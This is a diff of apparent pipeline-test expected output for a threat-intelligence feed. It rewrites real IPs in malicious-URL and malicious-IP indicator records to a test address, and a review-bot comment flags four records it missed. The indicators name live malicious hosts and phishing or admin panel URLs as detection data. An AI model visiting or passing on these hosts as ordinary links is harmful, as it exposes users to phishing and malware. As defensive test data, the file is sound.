@@ -21767,16 +21767,16 @@ "url": { "path": "/panel/admin.php", "extension": "php", - "original": "http://188.227.85.53/panel/admin.php", + "original": "http://89.160.20.156/panel/admin.php", "scheme": "http", - "domain": "188.227.85.53", - "full": "http://188.227.85.53/panel/admin.php" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/panel/admin.php" } } }, "event": { - "ingested": "2021-12-13T05:57:34.388069987Z", - "original": "{\"created\":\"2020-02-12T02:03:19.477Z\",\"description\":\"TS ID: 55309106235; iType: mal_url; State: active; Org: VoenTelecom nets; Source: CyberCrime\",\"id\":\"indicator--8c3385b7-6ee5-4699-87c8-7a7b1da9b6aa\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-49\"],\"modified\":\"2020-02-12T02:03:19.477Z\",\"name\":\"mal_url: http://188.227.85.53/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://188.227.85.53/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-12T02:03:19.477Z\"}", + "ingested": "2021-12-13T08:38:40.025293700Z", + "original": "{\"created\":\"2020-02-12T02:03:19.477Z\",\"description\":\"TS ID: 55309106235; iType: mal_url; State: active; Org: VoenTelecom nets; Source: CyberCrime\",\"id\":\"indicator--8c3385b7-6ee5-4699-87c8-7a7b1da9b6aa\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-49\"],\"modified\":\"2020-02-12T02:03:19.477Z\",\"name\":\"mal_url: http://89.160.20.156/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-12T02:03:19.477Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -21794,7 +21794,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 111.90.142.42", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55311776075; iType: mal_ip; State: active; Org: Shinjiru Technology Sdn Bhd; Source: CyberCrime", "modified": "2020-02-13T02:02:41.467Z", "valid_from": "2020-02-13T02:02:41.467Z", @@ -21816,12 +21816,12 @@ "first_seen": "2020-02-13T02:02:41.467Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "111.90.142.42" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.388074315Z", - "original": "{\"created\":\"2020-02-13T02:02:41.467Z\",\"description\":\"TS ID: 55311776075; iType: mal_ip; State: active; Org: Shinjiru Technology Sdn Bhd; Source: CyberCrime\",\"id\":\"indicator--91ef9dde-3f0a-472c-b8ec-a1b9951acb50\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-02-13T02:02:41.467Z\",\"name\":\"mal_ip: 111.90.142.42\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '111.90.142.42']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-13T02:02:41.467Z\"}", + "ingested": "2021-12-13T08:38:40.025301Z", + "original": "{\"created\":\"2020-02-13T02:02:41.467Z\",\"description\":\"TS ID: 55311776075; iType: mal_ip; State: active; Org: Shinjiru Technology Sdn Bhd; Source: CyberCrime\",\"id\":\"indicator--91ef9dde-3f0a-472c-b8ec-a1b9951acb50\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-02-13T02:02:41.467Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-13T02:02:41.467Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -21872,7 +21872,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388078573Z", + "ingested": "2021-12-13T08:38:40.025308200Z", "original": "{\"created\":\"2020-02-13T02:02:52.653Z\",\"description\":\"TS ID: 55311776233; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--948a3e06-3481-4873-94e7-8ab068284aba\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-13T02:02:52.653Z\",\"name\":\"mal_url: http://felicombo.club/Zebra/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://felicombo.club/Zebra/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-13T02:02:52.653Z\"}", "category": "threat", "type": "indicator", @@ -21924,7 +21924,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388082992Z", + "ingested": "2021-12-13T08:38:40.025312400Z", "original": "{\"created\":\"2020-02-13T02:03:16.624Z\",\"description\":\"TS ID: 55311776246; iType: mal_url; State: active; Org: Shinjiru Technology Sdn Bhd; Source: CyberCrime\",\"id\":\"indicator--3b3faeec-4f78-41f2-acd8-13090336f058\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-02-13T02:03:16.624Z\",\"name\":\"mal_url: http://pdocxoffice.com/Panel/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://pdocxoffice.com/Panel/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-13T02:03:16.624Z\"}", "category": "threat", "type": "indicator", 
@@ -21976,7 +21976,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388087180Z", + "ingested": "2021-12-13T08:38:40.025317700Z", "original": "{\"created\":\"2020-02-13T02:03:36.577Z\",\"description\":\"TS ID: 55311776248; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime\",\"id\":\"indicator--ae6ff4c4-73c1-473a-90cb-99f135240243\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-52\"],\"modified\":\"2020-02-13T02:03:36.577Z\",\"name\":\"mal_url: http://megaeditores.com/fgv/PHP/index.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://megaeditores.com/fgv/PHP/index.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-13T02:03:36.577Z\"}", "category": "threat", "type": "indicator", @@ -21995,7 +21995,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://45.153.185.12/prUjRYcU2rqFpZqv/login.php", + "name": "mal_url: http://89.160.20.156/prUjRYcU2rqFpZqv/login.php", "description": "TS ID: 55311776237; iType: mal_url; State: active; Source: CyberCrime", "modified": "2020-02-13T02:03:38.860Z", "valid_from": "2020-02-13T02:03:38.86Z", 
@@ -22020,16 +22020,16 @@ "url": { "path": "/prUjRYcU2rqFpZqv/login.php", "extension": "php", - "original": "http://45.153.185.12/prUjRYcU2rqFpZqv/login.php", + "original": "http://89.160.20.156/prUjRYcU2rqFpZqv/login.php", "scheme": "http", - "domain": "45.153.185.12", - "full": "http://45.153.185.12/prUjRYcU2rqFpZqv/login.php" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/prUjRYcU2rqFpZqv/login.php" } } }, "event": { - "ingested": "2021-12-13T05:57:34.388091778Z", - "original": "{\"created\":\"2020-02-13T02:03:38.86Z\",\"description\":\"TS ID: 55311776237; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--104abde1-c4e9-45a2-85e1-525ea3bec752\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-23\"],\"modified\":\"2020-02-13T02:03:38.86Z\",\"name\":\"mal_url: http://45.153.185.12/prUjRYcU2rqFpZqv/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://45.153.185.12/prUjRYcU2rqFpZqv/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-13T02:03:38.86Z\"}", + "ingested": "2021-12-13T08:38:40.025323200Z", + "original": "{\"created\":\"2020-02-13T02:03:38.86Z\",\"description\":\"TS ID: 55311776237; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--104abde1-c4e9-45a2-85e1-525ea3bec752\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-23\"],\"modified\":\"2020-02-13T02:03:38.86Z\",\"name\":\"mal_url: http://89.160.20.156/prUjRYcU2rqFpZqv/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/prUjRYcU2rqFpZqv/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-13T02:03:38.86Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -22079,7 +22079,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388096277Z", + "ingested": "2021-12-13T08:38:40.025329300Z", "original": "{\"created\":\"2020-02-20T04:06:53.787Z\",\"description\":\"TS ID: 55316616622; iType: mal_url; State: active; Org: Alibaba.com Singapore E-Commerce Private Limited; Source: CyberCrime\",\"id\":\"indicator--57d0bd25-4211-4e2e-8a4e-31e38eeda90b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-20T04:06:53.787Z\",\"name\":\"mal_url: http://hotlips.top/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://hotlips.top/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:06:53.787Z\"}", "category": "threat", "type": "indicator", @@ -22130,7 +22130,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388100575Z", + "ingested": "2021-12-13T08:38:40.025333200Z", "original": "{\"created\":\"2020-02-20T04:08:45.548Z\",\"description\":\"TS ID: 55316617564; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime\",\"id\":\"indicator--d11be9c2-b408-42a4-a4ad-0ede3c1709f0\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-20T04:08:45.548Z\",\"name\":\"mal_url: http://aflamdirectory.com/wp-content/ip/login/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://aflamdirectory.com/wp-content/ip/login/']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:08:45.548Z\"}", "category": "threat", "type": "indicator", 
@@ -22182,7 +22182,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388104933Z", + "ingested": "2021-12-13T08:38:40.025338600Z", "original": "{\"created\":\"2020-02-20T04:08:45.601Z\",\"description\":\"TS ID: 55316617187; iType: mal_url; State: active; Org: Telenet Ltd.; Source: CyberCrime\",\"id\":\"indicator--ed5ed1a3-8090-4db3-92cb-3b7b733fa28e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-02-20T04:08:45.601Z\",\"name\":\"mal_url: http://ayoobtextlie.com/craks/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ayoobtextlie.com/craks/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:08:45.601Z\"}", "category": "threat", "type": "indicator", @@ -22201,7 +22201,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 5.188.9.33", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55316616322; iType: mal_ip; State: active; Org: Petersburg Internet Network ltd.; Source: CyberCrime", "modified": "2020-02-20T04:09:16.891Z", "valid_from": "2020-02-20T04:09:16.891Z", 
@@ -22223,12 +22223,12 @@ "first_seen": "2020-02-20T04:09:16.891Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "5.188.9.33" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.388109201Z", - "original": "{\"created\":\"2020-02-20T04:09:16.891Z\",\"description\":\"TS ID: 55316616322; iType: mal_ip; State: active; Org: Petersburg Internet Network ltd.; Source: CyberCrime\",\"id\":\"indicator--6c201663-b1e4-483e-821b-0fe74aecc497\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-02-20T04:09:16.891Z\",\"name\":\"mal_ip: 5.188.9.33\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '5.188.9.33']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:09:16.891Z\"}", + "ingested": "2021-12-13T08:38:40.025345900Z", + "original": "{\"created\":\"2020-02-20T04:09:16.891Z\",\"description\":\"TS ID: 55316616322; iType: mal_ip; State: active; Org: Petersburg Internet Network ltd.; Source: CyberCrime\",\"id\":\"indicator--6c201663-b1e4-483e-821b-0fe74aecc497\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-02-20T04:09:16.891Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:09:16.891Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -22279,7 +22279,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388113519Z", + "ingested": "2021-12-13T08:38:40.025350200Z", "original": "{\"created\":\"2020-02-20T04:11:00.455Z\",\"description\":\"TS ID: 55316616996; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--8203935f-fb3f-418c-945d-40fca5ef088d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-20T04:11:00.455Z\",\"name\":\"mal_url: http://mecharnise.ir/ca10/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://mecharnise.ir/ca10/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:11:00.455Z\"}", "category": "threat", "type": "indicator", @@ -22298,7 +22298,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://5.8.88.27/login", + "name": "mal_url: http://89.160.20.156/login", "description": "TS ID: 55321824436; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime", "modified": "2020-02-20T04:28:36.154Z", "valid_from": "2020-02-20T04:28:36.154Z", 
@@ -22322,16 +22322,16 @@ "provider": "CyberCrime", "url": { "path": "/login", - "original": "http://5.8.88.27/login", + "original": "http://89.160.20.156/login", "scheme": "http", - "domain": "5.8.88.27", - "full": "http://5.8.88.27/login" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/login" } } }, "event": { - "ingested": "2021-12-13T05:57:34.388118639Z", - "original": "{\"created\":\"2020-02-20T04:28:36.154Z\",\"description\":\"TS ID: 55321824436; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--238f73e8-938d-4d08-9705-b1b669c129b2\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-77\"],\"modified\":\"2020-02-20T04:28:36.154Z\",\"name\":\"mal_url: http://5.8.88.27/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://5.8.88.27/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:28:36.154Z\"}", + "ingested": "2021-12-13T08:38:40.025354800Z", + "original": "{\"created\":\"2020-02-20T04:28:36.154Z\",\"description\":\"TS ID: 55321824436; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--238f73e8-938d-4d08-9705-b1b669c129b2\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-77\"],\"modified\":\"2020-02-20T04:28:36.154Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:28:36.154Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -22382,7 +22382,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388123478Z", + "ingested": "2021-12-13T08:38:40.025358300Z", "original": "{\"created\":\"2020-02-20T04:28:36.172Z\",\"description\":\"TS ID: 55321824399; iType: mal_url; State: active; Org: Global Frag Networks; Source: CyberCrime\",\"id\":\"indicator--6ff21635-ac08-4afe-b5e7-c18dfe320f0f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-70\"],\"modified\":\"2020-02-20T04:28:36.172Z\",\"name\":\"mal_url: http://23.247.102.18/4/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://23.247.102.18/4/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:28:36.172Z\"}", "category": "threat", "type": "indicator", @@ -22434,7 +22434,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388127966Z", + "ingested": "2021-12-13T08:38:40.025363400Z", "original": "{\"created\":\"2020-02-20T04:28:36.19Z\",\"description\":\"TS ID: 55321824397; iType: mal_url; State: active; Org: Global Frag Networks; Source: CyberCrime\",\"id\":\"indicator--9f55ff73-b6b6-476d-bb32-b9a7f8b16e93\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-70\"],\"modified\":\"2020-02-20T04:28:36.19Z\",\"name\":\"mal_url: http://23.247.102.18/6/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://23.247.102.18/6/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:28:36.19Z\"}", "category": "threat", "type": "indicator", 
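Review bot: The mal_url indicators whose `event.original` still names 23.247.102.18 (TS IDs 55321824399 and 55321824397 in the two hunks on this line, and 55321824403 and 55321824401 in the two hunks on the next line) keep a real public IP, while the comparable URL indicators for 188.227.85.53, 45.153.185.12 and 5.8.88.27 elsewhere in this file were rewritten to 89.160.20.156. If the commit's goal is that every public address in the fixture belongs to the supported test subset, these four records look missed; their `url.domain` / `url.full` fields fall outside the hunks, so I cannot confirm whether those were touched. Since this appears to be regenerated pipeline-test expected output, the substitution presumably belongs in the corresponding test input document rather than a hand edit here, after which `\"name\":\"mal_url: http://89.160.20.156/4/panel/admin.php\"` (and the matching `pattern` value) would follow the same convention as the other rewritten URL indicators.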
@@ -22485,7 +22485,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388132565Z", + "ingested": "2021-12-13T08:38:40.025369500Z", "original": "{\"created\":\"2020-02-20T04:30:25.248Z\",\"description\":\"TS ID: 55321824409; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--4abbf2ea-6e46-48e8-b74d-1928c92e6277\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-71\"],\"modified\":\"2020-02-20T04:30:25.248Z\",\"name\":\"mal_url: http://f0400035.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0400035.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:30:25.248Z\"}", "category": "threat", "type": "indicator", @@ -22504,7 +22504,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 217.8.117.22", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55321824418; iType: mal_ip; State: active; Source: CyberCrime", "modified": "2020-02-20T04:31:26.488Z", "valid_from": "2020-02-20T04:31:26.488Z", 
@@ -22526,12 +22526,12 @@ "first_seen": "2020-02-20T04:31:26.488Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "217.8.117.22" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.388136823Z", - "original": "{\"created\":\"2020-02-20T04:31:26.488Z\",\"description\":\"TS ID: 55321824418; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--8678d0a4-2b3c-4cea-a745-796f996e18bc\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-20T04:31:26.488Z\",\"name\":\"mal_ip: 217.8.117.22\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '217.8.117.22']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:31:26.488Z\"}", + "ingested": "2021-12-13T08:38:40.025375900Z", + "original": "{\"created\":\"2020-02-20T04:31:26.488Z\",\"description\":\"TS ID: 55321824418; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--8678d0a4-2b3c-4cea-a745-796f996e18bc\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-20T04:31:26.488Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:31:26.488Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -22582,7 +22582,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388141291Z", + "ingested": "2021-12-13T08:38:40.025383100Z", "original": "{\"created\":\"2020-02-20T04:31:26.532Z\",\"description\":\"TS ID: 55321824403; iType: mal_url; State: active; Org: Global Frag Networks; Source: CyberCrime\",\"id\":\"indicator--bfd713ad-3d94-441a-b6bc-135ce911b580\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-70\"],\"modified\":\"2020-02-20T04:31:26.532Z\",\"name\":\"mal_url: http://23.247.102.18/panel/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://23.247.102.18/panel/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:31:26.532Z\"}", "category": "threat", "type": "indicator", @@ -22634,7 +22634,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388145689Z", + "ingested": "2021-12-13T08:38:40.025390500Z", "original": "{\"created\":\"2020-02-20T04:31:26.582Z\",\"description\":\"TS ID: 55321824401; iType: mal_url; State: active; Org: Global Frag Networks; Source: CyberCrime\",\"id\":\"indicator--f43a4d56-b27f-41f0-917b-52358df31e13\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-70\"],\"modified\":\"2020-02-20T04:31:26.582Z\",\"name\":\"mal_url: http://23.247.102.18/2/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://23.247.102.18/2/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:31:26.582Z\"}", "category": "threat", "type": "indicator", 
@@ -22653,7 +22653,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 5.8.88.35", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55321824432; iType: mal_ip; State: active; Org: MoreneHost; Source: CyberCrime", "modified": "2020-02-20T04:32:16.603Z", "valid_from": "2020-02-20T04:32:16.603Z", @@ -22675,12 +22675,12 @@ "first_seen": "2020-02-20T04:32:16.603Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "5.8.88.35" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.388150218Z", - "original": "{\"created\":\"2020-02-20T04:32:16.603Z\",\"description\":\"TS ID: 55321824432; iType: mal_ip; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--36d62b8e-77db-4111-be17-d0a3e20bbd9d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-41\"],\"modified\":\"2020-02-20T04:32:16.603Z\",\"name\":\"mal_ip: 5.8.88.35\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '5.8.88.35']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:32:16.603Z\"}", + "ingested": "2021-12-13T08:38:40.025397800Z", + "original": "{\"created\":\"2020-02-20T04:32:16.603Z\",\"description\":\"TS ID: 55321824432; iType: mal_ip; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--36d62b8e-77db-4111-be17-d0a3e20bbd9d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-41\"],\"modified\":\"2020-02-20T04:32:16.603Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:32:16.603Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -22698,7 +22698,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 2.57.91.231", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55321824444; iType: mal_ip; State: active; Source: CyberCrime", "modified": "2020-02-20T04:32:52.041Z", "valid_from": "2020-02-20T04:32:52.041Z", @@ -22720,12 +22720,12 @@ "first_seen": "2020-02-20T04:32:52.041Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "2.57.91.231" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.388154987Z", - "original": "{\"created\":\"2020-02-20T04:32:52.041Z\",\"description\":\"TS ID: 55321824444; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--b6863ec6-1752-43b3-b748-ee8a29b6a52e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-20T04:32:52.041Z\",\"name\":\"mal_ip: 2.57.91.231\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '2.57.91.231']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:32:52.041Z\"}", + "ingested": "2021-12-13T08:38:40.025405200Z", + "original": "{\"created\":\"2020-02-20T04:32:52.041Z\",\"description\":\"TS ID: 55321824444; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--b6863ec6-1752-43b3-b748-ee8a29b6a52e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-20T04:32:52.041Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:32:52.041Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -22775,7 +22775,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388159345Z", + "ingested": "2021-12-13T08:38:40.025412400Z", "original": "{\"created\":\"2020-02-20T04:32:52.057Z\",\"description\":\"TS ID: 55321824423; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--fb1aa473-4d9d-46a3-b053-ae7c051d0e14\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-02-20T04:32:52.057Z\",\"name\":\"mal_url: http://lae9ac50.justinstalledpanel.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://lae9ac50.justinstalledpanel.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:32:52.057Z\"}", "category": "threat", "type": "indicator", @@ -22826,7 +22826,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388163513Z", + "ingested": "2021-12-13T08:38:40.025419500Z", 